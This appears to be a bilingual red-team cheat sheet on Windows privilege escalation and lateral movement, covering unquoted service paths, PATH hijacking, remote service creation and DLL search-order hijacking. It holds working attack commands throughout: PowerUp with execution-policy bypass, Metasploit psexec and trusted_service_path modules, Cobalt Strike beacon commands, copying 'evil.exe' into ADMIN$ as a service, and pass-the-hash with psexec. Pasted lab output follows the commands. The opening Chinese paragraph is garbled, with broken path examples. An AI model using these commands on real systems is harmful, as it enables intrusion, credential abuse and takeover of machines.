服务路径(存储在Windows注册表项中)[2]和快捷方式很容易被路径拦截，如果路径有一个或多个空格，并且没有被引号包围(例如，C:\ \program.exe vs. C:\ safe path with space\program.exe)。"C:\安全路径与空格\program.exe")。对手可以将可执行文件放在路径的较高级别目录中，Windows将解析该可执行文件而不是预期的可执行文件。例如，如果快捷方式中的路径是C:\program files\myapp。竞争对手可以在C:\program.exe上创建一个程序，该程序将代替预期的程序运行
PATH Environment Variable Misconfiguration
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.

Check for common privilege escalation methods

terminal下操作（借助powershell）

powershell -ep bypass .\powerup.ps1 Invoke-AllChecks

powershell -ExecutionPolicy Bypass .\powerup.ps1 Invoke-AllChecks

PS C:\Users\Administrator\Desktop\powrshell> powershell -ep bypass .\powerup.ps1 Invoke-AllChecks
PS C:\Users\Administrator\Desktop\powrshell> powershell -ExecutionPolicy Bypass  .\powerup.ps1 Invoke-AllChecks
PS C:\Users\Administrator\Desktop\powrshell> powershell -ExecutionPolicy Bypass -File .\powerup.ps1

msf下操作：

exploit/windows/local/trusted_service_path

msf5 exploit(windows/local/trusted_service_path) > exploit 
[*] Started reverse TCP handler on 192.168.2.107:4444 
[*] Finding a vulnerable service...
[-] Exploit aborted due to failure: not-vulnerable: No service found with trusted path issues
[*] Exploit completed, but no session was created.

cs下操作：

powershell-import /path/to/PowerUp.ps1

powershell Invoke-AllChecks

beacon> powershell C:\Users\Administrator\Desktop\powrshell\powerup.ps1
[*] Tasked beacon to run: C:\Users\Administrator\Desktop\powrshell\powerup.ps1
[+] host called home, sent: 203 bytes
[-] could not spawn powershell -nop -exec bypass -EncodedCommand QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAEQAZQBzAGsAdABvAHAAXABwAG8AdwByAHMAaABlAGwAbABcAHAAbwB3AGUAcgB1AHAALgBwAHMAMQA=: 2
beacon> powershell Invoke-AllChecks
[*] Tasked beacon to run: Invoke-AllChecks

Service Execution(服务执行)

Create a new service remotely（远程创建一个新服务）

terminal下操作

net use \COMP\ADMIN$ "password" /user:DOMAIN_NAME\UserName

copy evil.exe \COMP\ADMIN$\acachsrv.exe

sc \COMP create acachsrv binPath= "C:\Windows\System32\acachsrv.exe" start= auto description= "Description here" DisplayName= "DisplayName"

sc \COMP start acachsrv

C:\Documents and Settings\Administrator>net use \\COMP\ADMIN$ "password" /user:D
OMAIN_NAME\UserName
发生系统错误 67。
找不到网络名。
C:\Documents and Settings\Administrator>copy evil.exe \\COMP\ADMIN$\System32\aca
chsrv.exe
系统找不到指定的文件。
C:\Documents and Settings\Administrator>sc \\COMP create acachsrv binPath= "C:\W
indows\System32\acachsrv.exe" start= auto  DisplayName= "DisplayName"
[SC] OpenSCManager 失败 1722:
RPC 服务器不可用。
C:\Documents and Settings\Administrator>sc \\COMP start acachsrv
[SC] OpenSCManager 失败 1722:
RPC 服务器不可用。

cs下操作：

shell net use \COMP\ADMIN$ "password" /user:DOMAIN_NAME\UserName

shell copy evil.exe \COMP\ADMIN$\acachsrv.exe

shell sc \COMP create acachsrv binPath= "C:\Windows\System32\acachsrv.exe" start= auto description= "Description here" DisplayName= "DisplayName"

shell sc \COMP start acachsrv

C:\Documents and Settings\Administrator>net use \\COMP\ADMIN$ "password" /user:D
OMAIN_NAME\UserName
发生系统错误 67。
找不到网络名。
C:\Documents and Settings\Administrator>copy evil.exe \\COMP\ADMIN$\System32\aca
chsrv.exe
系统找不到指定的文件。
C:\Documents and Settings\Administrator>sc \\COMP create acachsrv binPath= "C:\W
indows\System32\acachsrv.exe" start= auto  DisplayName= "DisplayName"
[SC] OpenSCManager 失败 1722:
RPC 服务器不可用。
C:\Documents and Settings\Administrator>sc \\COMP start acachsrv
[SC] OpenSCManager 失败 1722:
RPC 服务器不可用。

Create a new service remotely (using psexec)(使用psexec创建新的远程服务)

原理：

psexec copies over a file to the remote box via SMB, then creates a service (usually a randomly named one) which points to the binary that was just copied over, starts the service, then deletes the service.
使用psexec通过smb复制文件，然后创建一个指向刚刚复制过来的二进制文件的随机名的服务，然后启动、删除服务

terminal下操作：

psexec /accepteula \ip -u domain\user -p password -c -f \smbip\share\file.exe (Copy and execute file.exe on the remote system)

psexec /accepteula \ip -u domain\user -p lm:ntlm cmd.exe /c dir c:\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)

psexec /accepteula \ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)

msf下操作：

exploit/windows/smb/psexec

exploit/windows/local/current_user_psexec

auxiliary/admin/smb/psexec_command

auxiliary/scanner/smb/psexec_loggedin_users

exploit/windows/smb/psexec_psh

msf5 exploit(multi/handler) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options 
Module options (exploit/windows/smb/psexec):
   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/psexec) > exploit 
[-] Handler failed to bind to 192.168.2.103:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 192.168.2.103:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > use exploit/windows/local/current_user_psexec 
msf5 exploit(windows/local/current_user_psexec) > show options 
Module options (exploit/windows/local/current_user_psexec):
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DISPNAME                           no        Service display name (Default: random)
   INTERNAL_ADDRESS                   no        Session's internal address or hostname for the victims to grab the payload from (Default: detected)
   KERBEROS          false            yes       Authenticate via Kerberos, dont resolve hostnames
   NAME                               no        Service name on each target in RHOSTS (Default: random)
   RHOSTS                             no        Target address range or CIDR identifier
   SESSION                            yes       The session to run this module on.
   TECHNIQUE         PSH              yes       Technique to use (Accepted: PSH, SMB)
Exploit target:
   Id  Name
   --  ----
   0   Universal
msf5 exploit(windows/local/current_user_psexec) > set session 1
session => 1
msf5 exploit(windows/local/current_user_psexec) > exploit 
msf5 exploit(windows/local/current_user_psexec) > use auxiliary/admin/smb/psexec_command 
msf5 auxiliary(admin/smb/psexec_command) > show options 
Module options (auxiliary/admin/smb/psexec_command):
   Name                  Current Setting                    Required  Description
   ----                  ---------------                    --------  -----------
   COMMAND               net group "Domain Admins" /domain  yes       The command you want to execute on the remote host
   RHOSTS                                                   yes       The target address range or CIDR identifier
   RPORT                 445                                yes       The Target port
   SERVICE_DESCRIPTION                                      no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                     no        The service display name
   SERVICE_NAME                                             no        The service name
   SMBDomain             .                                  no        The Windows domain to use for authentication
   SMBPass                                                  no        The password for the specified username
   SMBSHARE              C$                                 yes       The name of a writeable share on the server
   SMBUser                                                  no        The username to authenticate as
   THREADS               1                                  yes       The number of concurrent threads
   WINPATH               WINDOWS                            yes       The name of the remote Windows directory
msf5 auxiliary(admin/smb/psexec_command) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 auxiliary(admin/smb/psexec_command) > exploit 
[*] 192.168.2.103:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/psexec_command) > use auxiliary/scanner/smb/psexec_loggedin_users 
msf5 auxiliary(scanner/smb/psexec_loggedin_users) > show options 
Module options (auxiliary/scanner/smb/psexec_loggedin_users):
   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target address range or CIDR identifier
   RPORT                 445              yes       The Target port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBSHARE              C$               yes       The name of a writeable share on the server
   SMBUser                                no        The username to authenticate as
   THREADS               1                yes       The number of concurrent threads
   USERNAME                               no        The name of a specific user to search for
   WINPATH               WINDOWS          yes       The name of the Windows directory
msf5 auxiliary(scanner/smb/psexec_loggedin_users) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 auxiliary(scanner/smb/psexec_loggedin_users) > exploit 
[-] 192.168.2.103:445     - The connection was refused by the remote host (192.168.2.103:445).
[*] 192.168.2.103:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/psexec_loggedin_users) > use exploit/windows/smb/psexec_psh 
msf5 exploit(windows/smb/psexec_psh) > show options 
Module options (exploit/windows/smb/psexec_psh):
   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DryRun                false            no        Prints the powershell command that would be used
   RHOSTS                                 yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(windows/smb/psexec_psh) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/psexec_psh) > exploit 

cs下操作：

psexec COMP_NAME {listener name} (via sc)

psexec_sh COMP_NAME {listener name} (via powershell)

DLL Search Order Hijacking（DLL劫持）

原理：

Windows systems use a common method to look for required DLLs to load into a program. [1] Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.
Adversaries may perform DLL preloading, also called binary planting attacks, [2] by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. [3] Adversaries may use this behavior to cause the program to load a malicious DLL.
Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. [4] [5] [6]
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
通俗的来理解就是windows下的dll文件可以被替换或可以修改.manifest或.local重定向文件、目录或连接来直接修改程序加载DLL来达到权限提升或者其他的效果。

Check for common privilege escalation methods（常见的提权方法检测）

terminal下操作：

powershell.exe -epbypass PowerUp.ps1
Invoke-AllChecks

PS C:\Users\Administrator\Desktop\powrshell> powershell -ExecutionPolicy Bypass  .\powerup.ps1 Invoke-AllChecks

msf下操作：

exploit/windows/local/trusted_service_path

msf5 exploit(windows/local/trusted_service_path) > show options 
Module options (exploit/windows/local/trusted_service_path):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
Exploit target:
   Id  Name
   --  ----
   0   Windows
msf5 exploit(windows/local/trusted_service_path) > set session 1
session => 1
msf5 exploit(windows/local/trusted_service_path) > exploit 
[-] Handler failed to bind to 192.168.2.103:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Finding a vulnerable service...
[-] Exploit aborted due to failure: not-vulnerable: No service found with trusted path issues
[*] Exploit completed, but no session was created.